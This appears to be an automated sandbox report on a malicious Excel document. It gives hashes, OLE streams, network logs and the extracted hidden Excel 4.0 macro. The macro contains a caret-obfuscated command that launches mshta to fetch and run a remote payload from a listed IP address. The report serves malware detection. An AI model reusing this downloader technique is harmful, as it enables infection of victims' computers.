SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Reputation:	unknown
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFB91905051C23B5E7.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	3.517419133438836
Encrypted:	false
SSDEEP:	768:dJlk3hbdlylKsgqopeJBWhZFGkE+cMLxAAIZEtmi:drk3hbdlylKsgqopeJBWhZFGkE+cMLxl
MD5:	90BBAB05A4FF4BB17E4A70F529FBF5F9
SHA1:	8A302D36A0851F604B81016EC67E4EA0556263E2
SHA-256:	B32CF0C2FD94AFE1AE7E0CA2C211F2363270784E2AB97E6BB0899749BE517DB5
SHA-512:	6C881DFF935679C17F13DC7A1D00047D6F4825F022E9EE4B9E850219376856E60028D00D2403F28454B6B56E8C1826FE928FD432FECEAE32830E296B0CA8A122
Malicious:	false
Reputation:	unknown
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1K4VR2PW3EG92IH5IDUU.temp

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.58389176043684
Encrypted:	false
SSDEEP:	96:chQCcMqlqvsqvJCwolz8hQCcMqlqvsEHyqvJCwor/zIyYuHyUVhAlUVrA2:ciUolz8iAHnor/zI9UVhnA2
MD5:	7058F03336E9B68499C25299B9225929
SHA1:	A76E437B7FE66D4CFBE22ADB8D87AC37A388296E
SHA-256:	E1AF258DD3672DF2FD3205711BA938DA9463B45F7A7DEC6E518F20731EA1F152
SHA-512:	619504984C735486B2A1EC437D484B956E0AB5670C1C7AF9FE8AE9FFE821929D05AB7C873051EEFD029FE5BAEFDF62D93295A37F97E534C7A2912745059F9464
Malicious:	false
Reputation:	unknown
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S"...Programs..f.......:...S"....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.58389176043684
Encrypted:	false
SSDEEP:	96:chQCcMqlqvsqvJCwolz8hQCcMqlqvsEHyqvJCwor/zIyYuHyUVhAlUVrA2:ciUolz8iAHnor/zI9UVhnA2
MD5:	7058F03336E9B68499C25299B9225929
SHA1:	A76E437B7FE66D4CFBE22ADB8D87AC37A388296E
SHA-256:	E1AF258DD3672DF2FD3205711BA938DA9463B45F7A7DEC6E518F20731EA1F152
SHA-512:	619504984C735486B2A1EC437D484B956E0AB5670C1C7AF9FE8AE9FFE821929D05AB7C873051EEFD029FE5BAEFDF62D93295A37F97E534C7A2912745059F9464
Malicious:	false
Reputation:	unknown
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S"...Programs..f.......:...S"....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\Desktop\364453688149503140239183.xls

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 27 20:28:58 2022, Last Saved Time/Date: Thu Jan 27 20:32:51 2022, Security: 0
Category:	dropped
Size (bytes):	47616
Entropy (8bit):	6.003066970272085
Encrypted:	false
SSDEEP:	768:HJlk3hbdlylKsgqopeJBWhZFGkE+cMLxAAIZEtm/piJaiyH5YnJe+eO+8WoFYpLy:Hrk3hbdlylKsgqopeJBWhZFGkE+cMLxl
MD5:	5BEF9644759EAA393FB6961698E69BE6
SHA1:	73C9BBD08D2CCCE85008673AC820D9E883908A08
SHA-256:	C195F5C47D4048BD8CB26596FE2DC884FF86E98E987CCF338D2A2035318A2231
SHA-512:	C83B14C2C14DB96551A4E377A1D3C00FB74F4B574C1F8109B78A37A8598F2510EA8BFAE4C469566A12935521FF367FFBBCB001E47AF531931D684FC14F5A4DD0
Malicious:	true
Yara Hits:	Rule: SUSP_Excel4Macro_AutoOpen, Description: Detects Excel4 macro use with auto open / close, Source: C:\Users\user\Desktop\364453688149503140239183.xls, Author: John Lambert @JohnLaTwC Rule: JoeSecurity_XlsWithMacro4, Description: Yara detected Xls With Macro 4.0, Source: C:\Users\user\Desktop\364453688149503140239183.xls, Author: Joe Security
Reputation:	unknown
Preview:	......................>.......................[...........................Z...........................................................................................................................................................................................................................................................................................................................................................................................................................................................ZO..........................\.p....user B.....a.........=...........................................=........p.08.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.*.h...6...........C.a.l.i.b.r.i. .L.i.g.h.t.1.

C:\Windows\SysWOW64\Bwqooqqzlaw\cojfo.cqz (copy)

Download File

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	548864
Entropy (8bit):	6.9805281108446335
Encrypted:	false
SSDEEP:	12288:B2AavzUBPSczbeeTLjvGyMwWd3DYr6i64/:OUBPSczbeeTnv6ZDWA
MD5:	29389EBE59F75F143BC38D8932E06808
SHA1:	D5370F203FD1A34F4B4A5AAE58C2EEE0B39F864B
SHA-256:	AB46128507884F34AA46ADEDB1266B5D3DCD09EB39D657E3FAE7A97B870B8350
SHA-512:	CC9645B935093040758099B9B8E0C201B35D4CA2638E3BC0B71E03412F16259583E32E1559E123B64D9FB72C1A795CDE26022927756BCC4943718CC336316408
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......hs.a,..2,..2,..2...2&..2...27..2,..2...2...26..2...2...2...2...2...2-..2...2-..2...2-..2Rich,..2................PE..L...>..a...........!.....P...................`......................................................................@-..R...4...........PV......................0N......................................@............`..........@....................text...9E.......P.................. ..`.rdata.......`.......`..............@..@.data....e...0...0...0..............@....rsrc...PV.......`...`..............@..@.reloc..b...........................@..B........................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 27 20:28:58 2022, Last Saved Time/Date: Thu Jan 27 20:32:51 2022, Security: 0
Entropy (8bit):	5.979842615964849
TrID:	Microsoft Excel sheet (30009/1) 78.94% Generic OLE2 / Multistream Compound File (8008/1) 21.06%
File name:	364453688149503140239183.xls
File size:	47865
MD5:	4097bbda61bfb39067eab29fb342e34e
SHA1:	ca13a07a1eb59e7b30f217239a0db63235354c49
SHA256:	4d876f4afaf9df30d8b9ecaeddd86defa6dedd94dcaa933d67fe578b9cabdc18
SHA512:	c644a5280a8c0176b786c74333421b04df43ec3ff6c4a56e84ff194bf8f26a8a6ccb5256743ece86665119a7267232dd3086cc971d02b7ae760cdc842c416680
SSDEEP:	768:0Jlk3hbdlylKsgqopeJBWhZFGkE+cMLxAAIZEtm/piJaiyH5YnJe+eO+8WoFYpLd:0rk3hbdlylKsgqopeJBWhZFGkE+cMLx6
File Content Preview:	........................>.......................[...........................Z..................................................................................................................................................................................

File Icon


Icon Hash:	e4eea286a4b4bcb4

Static OLE Info

General

Document Type:	OLE
Number of OLE Files:	1

OLE File "364453688149503140239183.xls"

Indicators

Has Summary Info:	True
Application Name:	Microsoft Excel
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	True

Summary

Code Page:	1251
Author:	xXx
Last Saved By:	xXx
Create Time:	2022-01-27 20:28:58
Last Saved Time:	2022-01-27 20:32:51
Creating Application:	Microsoft Excel
Security:	0

Document Summary

Document Code Page:	1251
Thumbnail Scaling Desired:	False
Company:
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	1048576

Streams

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.322065673806
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . G O D V I N . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . . .
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f0 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 aa 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.262591150018
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x X x . . . . . . . . . x X x . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 37694

General
Stream Path:	Workbook
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	37694
Entropy:	6.96044271744
Base64 Encoded:	True
Data ASCII:	. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . x X x B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . p . 0 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . . . . . .
Data Raw:	09 08 10 00 00 06 05 00 5a 4f cd 07 c1 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 03 00 00 78 58 78 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

Macro 4.0 Code

Name:	GODVIN
Type:	3
Final:	False
Visible:	False
Protected:	False
GODVIN3False0Falsepost3,9,' By in no ecstatic wondered disposal my speaking. Direct wholly valley or uneasy it at really. Sir wish like said dull and need make. Sportsman one bed departure rapturous situation disposing his. Off say yet ample ten ought hence. Depending in newspaper an september do existence strangers. Total great saw water had mirth happy new. Projecting pianoforte no of partiality is on. Nay besides joy society him totally six.5,9,' Lose away off why half led have near bed. At engage simple father of period others except. My giving do summer of though narrow marked at. Spring formal no county ye waited. My whether cheered at regular it of promise blushes perhaps. Uncommonly simplicity interested mr is be compliment projecting my inhabiting. Gentleman he september in oh excellent.7,9,' On on produce colonel pointed. Just four sold need over how any. In to september suspicion determine he prevailed admitting. On adapted an as affixed limited on. Giving cousin warmly things no spring mr be abroad. Relation breeding be as repeated strictly followed margaret. One gravity son brought shyness waiting regular led ham.13,9,=EXEC("CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l")14,9,' By in no ecstatic wondered disposal my speaking. Direct wholly valley or uneasy it at really. Sir wish like said dull and need make. Sportsman one bed departure rapturous situation disposing his. Off say yet ample ten ought hence. Depending in newspaper an september do existence strangers. Total great saw water had mirth happy new. Projecting pianoforte no of partiality is on. Nay besides joy society him totally six.16,9,' Lose away off why half led have near bed. At engage simple father of period others except. My giving do summer of though narrow marked at. Spring formal no county ye waited. My whether cheered at regular it of promise blushes perhaps. Uncommonly simplicity interested mr is be compliment projecting my inhabiting. Gentleman he september in oh excellent.18,9,' On on produce colonel pointed. Just four sold need over how any. In to september suspicion determine he prevailed admitting. On adapted an as affixed limited on. Giving cousin warmly things no spring mr be abroad. Relation breeding be as repeated strictly followed margaret. One gravity son brought shyness waiting regular led ham.20,9,=HALT()21,9,' By in no ecstatic wondered disposal my speaking. Direct wholly valley or uneasy it at really. Sir wish like said dull and need make. Sportsman one bed departure rapturous situation disposing his. Off say yet ample ten ought hence. Depending in newspaper an september do existence strangers. Total great saw water had mirth happy new. Projecting pianoforte no of partiality is on. Nay besides joy society him totally six.23,9,' Lose away off why half led have near bed. At engage simple father of period others except. My giving do summer of though narrow marked at. Spring formal no county ye waited. My whether cheered at regular it of promise blushes perhaps. Uncommonly simplicity interested mr is be compliment projecting my inhabiting. Gentleman he september in oh excellent.25,9,' On on produce colonel pointed. Just four sold need over how any. In to september suspicion determine he prevailed admitting. On adapted an as affixed limited on. Giving cousin warmly things no spring mr be abroad. Relation breeding be as repeated strictly followed margaret. One gravity son brought shyness waiting regular led ham.

Name:	GODVIN
Type:	3
Final:	False
Visible:	False
Protected:	False
GODVIN3False0Falsepre3,9,' By in no ecstatic wondered disposal my speaking. Direct wholly valley or uneasy it at really. Sir wish like said dull and need make. Sportsman one bed departure rapturous situation disposing his. Off say yet ample ten ought hence. Depending in newspaper an september do existence strangers. Total great saw water had mirth happy new. Projecting pianoforte no of partiality is on. Nay besides joy society him totally six.5,9,' Lose away off why half led have near bed. At engage simple father of period others except. My giving do summer of though narrow marked at. Spring formal no county ye waited. My whether cheered at regular it of promise blushes perhaps. Uncommonly simplicity interested mr is be compliment projecting my inhabiting. Gentleman he september in oh excellent.7,9,' On on produce colonel pointed. Just four sold need over how any. In to september suspicion determine he prevailed admitting. On adapted an as affixed limited on. Giving cousin warmly things no spring mr be abroad. Relation breeding be as repeated strictly followed margaret. One gravity son brought shyness waiting regular led ham.13,9,=EXEC("CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l")14,9,' By in no ecstatic wondered disposal my speaking. Direct wholly valley or uneasy it at really. Sir wish like said dull and need make. Sportsman one bed departure rapturous situation disposing his. Off say yet ample ten ought hence. Depending in newspaper an september do existence strangers. Total great saw water had mirth happy new. Projecting pianoforte no of partiality is on. Nay besides joy society him totally six.16,9,' Lose away off why half led have near bed. At engage simple father of period others except. My giving do summer of though narrow marked at. Spring formal no county ye waited. My whether cheered at regular it of promise blushes perhaps. Uncommonly simplicity interested mr is be compliment projecting my inhabiting. Gentleman he september in oh excellent.18,9,' On on produce colonel pointed. Just four sold need over how any. In to september suspicion determine he prevailed admitting. On adapted an as affixed limited on. Giving cousin warmly things no spring mr be abroad. Relation breeding be as repeated strictly followed margaret. One gravity son brought shyness waiting regular led ham.20,9,=HALT()21,9,' By in no ecstatic wondered disposal my speaking. Direct wholly valley or uneasy it at really. Sir wish like said dull and need make. Sportsman one bed departure rapturous situation disposing his. Off say yet ample ten ought hence. Depending in newspaper an september do existence strangers. Total great saw water had mirth happy new. Projecting pianoforte no of partiality is on. Nay besides joy society him totally six.23,9,' Lose away off why half led have near bed. At engage simple father of period others except. My giving do summer of though narrow marked at. Spring formal no county ye waited. My whether cheered at regular it of promise blushes perhaps. Uncommonly simplicity interested mr is be compliment projecting my inhabiting. Gentleman he september in oh excellent.25,9,' On on produce colonel pointed. Just four sold need over how any. In to september suspicion determine he prevailed admitting. On adapted an as affixed limited on. Giving cousin warmly things no spring mr be abroad. Relation breeding be as repeated strictly followed margaret. One gravity son brought shyness waiting regular led ham.

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
01/28/22-21:30:05.283601	TCP	2034631	ET TROJAN Maldoc Activity (set)	49166	80	192.168.2.22	91.240.118.168

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 28, 2022 21:29:59.612735987 CET	49165	80	192.168.2.22	91.240.118.168
Jan 28, 2022 21:29:59.673969984 CET	80	49165	91.240.118.168	192.168.2.22
Jan 28, 2022 21:29:59.674043894 CET	49165	80	192.168.2.22	91.240.118.168
Jan 28, 2022 21:29:59.674928904 CET	49165	80	192.168.2.22	91.240.118.168
Jan 28, 2022 21:29:59.736032009 CET	80	49165	91.240.118.168	192.168.2.22
Jan 28, 2022 21:29:59.736197948 CET	80	49165	91.240.118.168	192.168.2.22
Jan 28, 2022 21:29:59.736221075 CET	80	49165	91.240.118.168	192.168.2.22
Jan 28, 2022 21:29:59.736242056 CET	80	49165	91.240.118.168	192.168.2.22
Jan 28, 2022 21:29:59.736253977 CET	49165	80	192.168.2.22	91.240.118.168
Jan 28, 2022 21:29:59.736264944 CET	49165	80	192.168.2.22	91.240.118.168
Jan 28, 2022 21:29:59.736277103 CET	49165	80	192.168.2.22	91.240.118.168
Jan 28, 2022 21:29:59.736295938 CET	80	49165	91.240.118.168	192.168.2.22
Jan 28, 2022 21:29:59.736316919 CET	80	49165	91.240.118.168	192.168.2.22
Jan 28, 2022 21:29:59.736329079 CET	49165	80	192.168.2.22	91.240.118.168
Jan 28, 2022 21:29:59.736345053 CET	49165	80	192.168.2.22	91.240.118.168
Jan 28, 2022 21:29:59.736351967 CET	80	49165	91.240.118.168	192.168.2.22
Jan 28, 2022 21:29:59.736371994 CET	80	49165	91.240.118.168	192.168.2.22
Jan 28, 2022 21:29:59.736381054 CET	49165	80	192.168.2.22	91.240.118.168
Jan 28, 2022 21:29:59.736397028 CET	49165	80	192.168.2.22	91.240.118.168
Jan 28, 2022 21:29:59.736409903 CET	80	49165	91.240.118.168	192.168.2.22
Jan 28, 2022 21:29:59.736426115 CET	80	49165	91.240.118.168	192.168.2.22
Jan 28, 2022 21:29:59.736440897 CET	49165	80	192.168.2.22	91.240.118.168
Jan 28, 2022 21:29:59.736455917 CET	49165	80	192.168.2.22	91.240.118.168
Jan 28, 2022 21:29:59.757611990 CET	49165	80	192.168.2.22	91.240.118.168
Jan 28, 2022 21:30:05.222527027 CET	49166	80	192.168.2.22	91.240.118.168
Jan 28, 2022 21:30:05.281189919 CET	80	49166	91.240.118.168	192.168.2.22
Jan 28, 2022 21:30:05.281279087 CET	49166	80	192.168.2.22	91.240.118.168
Jan 28, 2022 21:30:05.283601046 CET	49166	80	192.168.2.22	91.240.118.168
Jan 28, 2022 21:30:05.342128038 CET	80	49166	91.240.118.168	192.168.2.22
Jan 28, 2022 21:30:05.342173100 CET	80	49166	91.240.118.168	192.168.2.22
Jan 28, 2022 21:30:05.342190027 CET	80	49166	91.240.118.168	192.168.2.22
Jan 28, 2022 21:30:05.342240095 CET	49166	80	192.168.2.22	91.240.118.168
Jan 28, 2022 21:30:05.756164074 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:06.070408106 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:06.070489883 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:06.070625067 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:06.383723974 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:06.391297102 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:06.391338110 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:06.391362906 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:06.391386986 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:06.391411066 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:06.391434908 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:06.391452074 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:06.391458988 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:06.391485929 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:06.391510963 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:06.391532898 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:06.393876076 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:06.393891096 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:06.393893957 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:06.587346077 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:06.704612017 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:06.704646111 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:06.704668045 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:06.704689980 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:06.704741955 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:06.706851959 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:06.706880093 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:06.706901073 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:06.706902027 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:06.706923962 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:06.706932068 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:06.706947088 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:06.706969023 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:06.706979990 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:06.706993103 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:06.707015991 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:06.707025051 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:06.707039118 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:06.707062006 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:06.707071066 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:06.707083941 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:06.707107067 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:06.707114935 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:06.707134962 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:06.707158089 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:06.707169056 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:06.900599003 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:06.900636911 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:06.900710106 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.017822981 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.017885923 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.017910004 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.017930031 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.017951012 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.017971039 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.018004894 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.018043041 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.020210981 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.020242929 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.020267963 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.020289898 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.020292997 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.020313025 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.020325899 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.020334005 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.020356894 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.020370007 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.020378113 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.020400047 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.020415068 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.020420074 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.020442009 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.020459890 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.020462036 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.020483971 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.020497084 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.020504951 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.020525932 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.020539045 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:07.020545959 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:07.020565987 CET	80	49167	139.59.58.214	192.168.2.22
